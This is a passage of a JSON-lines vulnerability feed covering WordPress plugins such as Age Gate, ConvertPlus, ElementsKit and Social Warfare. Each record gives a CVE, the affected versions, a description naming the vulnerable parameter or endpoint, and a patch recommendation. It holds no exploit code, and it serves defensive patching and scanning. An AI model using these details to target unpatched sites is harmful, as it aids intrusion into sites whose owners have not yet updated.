{"CVE_ID":"CVE-2025-2505","slug":"age-gate","versionImpact":"3.5.3","versionEndExcluding":"3.5.4","description":"The Age Gate plugin for WordPress is vulnerable to Local PHP File Inclusion in all versions up to, and including, 3.5.3 via the 'lang' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary PHP files on the server, allowing the execution of code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 3.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/age-gate\\\/trunk\\\/vendor\\\/agegate\\\/common\\\/src\\\/Settings.php#L27\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/age-gate\\\/trunk\\\/vendor\\\/agegate\\\/common\\\/src\\\/Settings.php#L27\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3258075\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3258075\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6ac2996-098f-474c-b44e-78d5af7b503a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6ac2996-098f-474c-b44e-78d5af7b503a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3163","slug":"easy-property-listings","versionImpact":"3.5.3","versionEndExcluding":"3.5.4","description":"The Easy Property Listings WordPress plugin before 3.5.4 does not have CSRF check when deleting contacts in bulk, which could allow attackers to make a logged in admin delete them via a CSRF attack","recommendation":"Update to version 3.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f89c8654-5486-4939-880d-101f33d359c0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f89c8654-5486-4939-880d-101f33d359c0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4333","slug":"sina-extension-for-elementor","versionImpact":"3.5.3","versionEndExcluding":"3.5.4","description":"The Sina Extension for Elementor (Slider, Gallery, Form, Modal, Data Table, Tab, Particle, Free Elementor Widgets & Elementor Templates) plugin for WordPress is vulnerable to DOM-Based Cross-Site Scripting via several parameters in versions up to, and including, 3.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085825\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085825\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/assets\\\/js\\\/jquery.countdown.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/assets\\\/js\\\/jquery.countdown.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/assets\\\/js\\\/typed.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sina-extension-for-elementor\\\/trunk\\\/assets\\\/js\\\/typed.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f616df94-7839-49db-baa5-88f8f1de208f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f616df94-7839-49db-baa5-88f8f1de208f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2869","slug":"easy-property-listings","versionImpact":"3.5.3","versionEndExcluding":"3.5.4","description":"The Easy Property Listings WordPress plugin before 3.5.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 3.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4093c12e-f62b-4357-8893-649cd2aaeace\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4093c12e-f62b-4357-8893-649cd2aaeace\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13800","slug":"convertplug","versionImpact":"3.5.30","versionEndExcluding":"3.5.31","description":"The ConvertPlus plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to a missing capability check on the 'cp_dismiss_notice' AJAX endpoint in all versions up to, and including, 3.5.30. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update option values to '1' on the WordPress site. This can be leveraged to update an option that would create an error on the site and deny service to legitimate users or be used to set some values to true such as registration.","recommendation":"Update to version 3.5.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.convertplug.com\\\/plus\\\/product\\\/convertplug\\\/\",\"name\":\"https:\\\/\\\/www.convertplug.com\\\/plus\\\/product\\\/convertplug\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/580ae2da-76f2-42b3-a26c-62ad8d6d1686?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/580ae2da-76f2-42b3-a26c-62ad8d6d1686?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4479","slug":"elementskit-lite","versionImpact":"3.5.2","versionEndExcluding":"3.5.3","description":"The ElementsKit Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin image comparison widget's before\/after labels in all versions up to, and including, 3.5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.5.0\\\/widgets\\\/init\\\/assets\\\/js\\\/elementor.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.5.0\\\/widgets\\\/init\\\/assets\\\/js\\\/elementor.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.5.0\\\/widgets\\\/init\\\/assets\\\/js\\\/widget-scripts.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.5.0\\\/widgets\\\/init\\\/assets\\\/js\\\/widget-scripts.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3311822%40elementskit-lite&old=3300179%40elementskit-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3311822%40elementskit-lite&old=3300179%40elementskit-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2995828-8a3e-400d-9e2b-aba8fd17cf00?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2995828-8a3e-400d-9e2b-aba8fd17cf00?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8239","slug":"starbox","versionImpact":"3.5.2","versionEndExcluding":"3.5.3","description":"The Starbox WordPress plugin before 3.5.3 does not properly render social media profile URLs in certain contexts, like the malicious user's profile or pages where the starbox shortcode is used, which may be abused by users with at least the contributor role to conduct Stored XSS attacks.","recommendation":"Update to version 3.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/02796da0-218d-4cbb-98ca-49eeea83cac5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/02796da0-218d-4cbb-98ca-49eeea83cac5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3614","slug":"elementskit-lite","versionImpact":"3.5.2","versionEndExcluding":"3.5.3","description":"The ElementsKit Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the URL attribute of a custom widget in all versions up to, and including, 3.5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.4.8\\\/modules\\\/widget-builder\\\/controls\\\/control-type-url.php#L9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.4.8\\\/modules\\\/widget-builder\\\/controls\\\/control-type-url.php#L9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.4.8\\\/modules\\\/widget-builder\\\/controls\\\/widget-writer.php#L366\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/tags\\\/3.4.8\\\/modules\\\/widget-builder\\\/controls\\\/widget-writer.php#L366\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1627e235-7836-43dc-a3f6-7f79da6ab229?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1627e235-7836-43dc-a3f6-7f79da6ab229?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4434","slug":"social-warfare","versionEndExcluding":"3.5.3","description":"The Social Warfare plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 3.5.2 via the 'swp_url' parameter. This allows attackers to execute code on the server.","recommendation":"Update to version 3.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98cf2a10-cc53-4479-87d1-71489f6a8c51?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98cf2a10-cc53-4479-87d1-71489f6a8c51?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/163680\\\/WordPress-Social-Warfare-3.5.2-Remote-Code-Execution.html\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/163680\\\/WordPress-Social-Warfare-3.5.2-Remote-Code-Execution.html\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4838","slug":"convertplug","versionImpact":"3.5.26","versionEndExcluding":"3.5.26.1","description":"The ConvertPlus plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.5.26 via deserialization of untrusted input from the 'settings_encoded' attribute of the 'smile_modal' shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 3.5.26.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/16f5a104-dce0-4249-91b9-67f99cce16d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/16f5a104-dce0-4249-91b9-67f99cce16d3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.convertplug.com\\\/plus\\\/\",\"name\":\"https:\\\/\\\/www.convertplug.com\\\/plus\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3240","slug":"convertplug","versionImpact":"3.5.25","versionEndExcluding":"3.5.26","description":"The ConvertPlug plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.5.25 via deserialization of untrusted input from the 'settings_encoded' attribute of the 'smile_info_bar' shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 3.5.26, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fca3259b-bf0e-4b4a-815f-1eb399b8b674?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fca3259b-bf0e-4b4a-815f-1eb399b8b674?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.convertplug.com\\\/plus\\\/product\\\/convertplug\\\/\",\"name\":\"https:\\\/\\\/www.convertplug.com\\\/plus\\\/product\\\/convertplug\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3237","slug":"convertplug","versionImpact":"3.5.25","versionEndExcluding":"3.5.26","description":"The ConvertPlug plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the cp_dismiss_notice() function in all versions up to, and including, 3.5.25. This makes it possible for authenticated attackers, with subscriber-level access and above, to update arbitrary option values to true.","recommendation":"Update to version 3.5.26, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cd72420-dca1-455d-92a6-a178b4b26eab?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cd72420-dca1-455d-92a6-a178b4b26eab?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.convertplug.com\\\/plus\\\/product\\\/convertplug\\\/\",\"name\":\"https:\\\/\\\/www.convertplug.com\\\/plus\\\/product\\\/convertplug\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5860","slug":"tickera-event-ticketing-system","versionImpact":"3.5.2.8","versionEndExcluding":"3.5.2.9","description":"The Tickera \u2013 WordPress Event Ticketing plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the tc_dl_delete_tickets AJAX action in all versions up to, and including, 3.5.2.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete all tickets associated with events.","recommendation":"Update to version 3.5.2.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d86aa41c-24df-49ec-b273-7bb57addddde?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d86aa41c-24df-49ec-b273-7bb57addddde?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3103413%40tickera-event-ticketing-system&new=3103413%40tickera-event-ticketing-system&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3103413%40tickera-event-ticketing-system&new=3103413%40tickera-event-ticketing-system&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8013","slug":"quttera-web-malware-scanner","versionImpact":"3.5.1.41","versionEndExcluding":"3.5.2.1","description":"The Quttera Web Malware Scanner plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 3.5.1.41 via the 'RunExternalScan' function. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 3.5.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quttera-web-malware-scanner\\\/trunk\\\/qtrAjaxHandler.php#L352\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quttera-web-malware-scanner\\\/trunk\\\/qtrAjaxHandler.php#L352\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quttera-web-malware-scanner\\\/trunk\\\/qtrExternalScanner.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quttera-web-malware-scanner\\\/trunk\\\/qtrExternalScanner.php#L28\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3344330\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3344330\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40957153-45f1-40c9-91ce-f3491ca7eee5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40957153-45f1-40c9-91ce-f3491ca7eee5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7136","slug":"jet-search","versionImpact":"3.5.2","versionEndExcluding":"3.5.2.1","description":"The JetSearch plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 3.5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.5.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fe9fe85-bcb5-4e12-b879-31bc73074eed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fe9fe85-bcb5-4e12-b879-31bc73074eed?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/crocoblock.com\\\/plugins\\\/jetsearch\\\/\",\"name\":\"https:\\\/\\\/crocoblock.com\\\/plugins\\\/jetsearch\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4416","slug":"wp-mpdf","versionEndExcluding":"3.5.2","description":"The wp-mpdf plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.5.1. This is due to missing or incorrect nonce validation on the mpdf_admin_savepost() function. This makes it possible for unauthenticated attackers to save post data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c47386ee-25c8-4a77-92e8-5a82afc9c826?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c47386ee-25c8-4a77-92e8-5a82afc9c826?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2549363\\\/wp-mpdf\\\/trunk\\\/wp-mpdf.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2549363\\\/wp-mpdf\\\/trunk\\\/wp-mpdf.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10813","slug":"woo-product-table","versionImpact":"3.5.1","versionEndExcluding":"3.5.2","description":"The Product Table for WooCommerce by CodeAstrology (wooproducttable.com) plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.5.1 via the var_dump_table parameter. This makes it possible for unauthenticated attackers var data.","recommendation":"Update to version 3.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-table\\\/trunk\\\/inc\\\/shortcode-base.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-product-table\\\/trunk\\\/inc\\\/shortcode-base.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e67f680a-8942-45fa-8458-a27c78045aa1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e67f680a-8942-45fa-8458-a27c78045aa1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2186","slug":"wp-marketing-automations","versionImpact":"3.5.1","versionEndExcluding":"3.5.2","description":"The Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit plugin for WordPress is vulnerable to SQL Injection via the \u2018automationId\u2019 parameter in all versions up to, and including, 3.5.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-marketing-automations\\\/trunk\\\/includes\\\/api\\\/wc\\\/class-bwfan-api-get-automation-dynamic-coupon.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-marketing-automations\\\/trunk\\\/includes\\\/api\\\/wc\\\/class-bwfan-api-get-automation-dynamic-coupon.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257474\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257474\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88f8fa25-e3d5-4dfd-aae5-68b5880ffd53?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88f8fa25-e3d5-4dfd-aae5-68b5880ffd53?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7955","slug":"starbox","versionImpact":"3.5.1","versionEndExcluding":"3.5.2","description":"The Starbox  WordPress plugin before 3.5.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cbfcbe57-553d-490a-b7f3-48aa0022f63d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cbfcbe57-553d-490a-b7f3-48aa0022f63d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11154","slug":"revisionary","versionImpact":"3.5.15","versionEndExcluding":"3.5.16","description":"The PublishPress Revisions: Duplicate Posts, Submit, Approve and Schedule Content Changes plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.5.15 via the 'actAjaxRevisionDiffs' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive data including revisions of posts and pages.","recommendation":"Update to version 3.5.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c785b7a0-5091-4d89-87d3-cd7d9984553e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c785b7a0-5091-4d89-87d3-cd7d9984553e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/publishpress\\\/PublishPress-Revisions\\\/blob\\\/master\\\/admin\\\/history_rvy.php#L322\",\"name\":\"https:\\\/\\\/github.com\\\/publishpress\\\/PublishPress-Revisions\\\/blob\\\/master\\\/admin\\\/history_rvy.php#L322\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/revisionary\\\/trunk\\\/admin\\\/history_rvy.php#L322\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/revisionary\\\/trunk\\\/admin\\\/history_rvy.php#L322\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3192492\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3192492\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9436","slug":"revisionary","versionImpact":"3.5.14","versionEndExcluding":"3.5.15","description":"The PublishPress Revisions: Duplicate Posts, Submit, Approve and Schedule Content Changes plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.5.14. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.5.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/982bc924-1dcd-47b5-b15a-4ff0ad123ad1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/982bc924-1dcd-47b5-b15a-4ff0ad123ad1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/revisionary\\\/tags\\\/3.5.14\\\/admin\\\/class-list-table_rvy.php#L717\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/revisionary\\\/tags\\\/3.5.14\\\/admin\\\/class-list-table_rvy.php#L717\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165210\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165210\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/revisionary\\\/tags\\\/3.5.14\\\/admin\\\/class-list-table-archive.php#L780\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/revisionary\\\/tags\\\/3.5.14\\\/admin\\\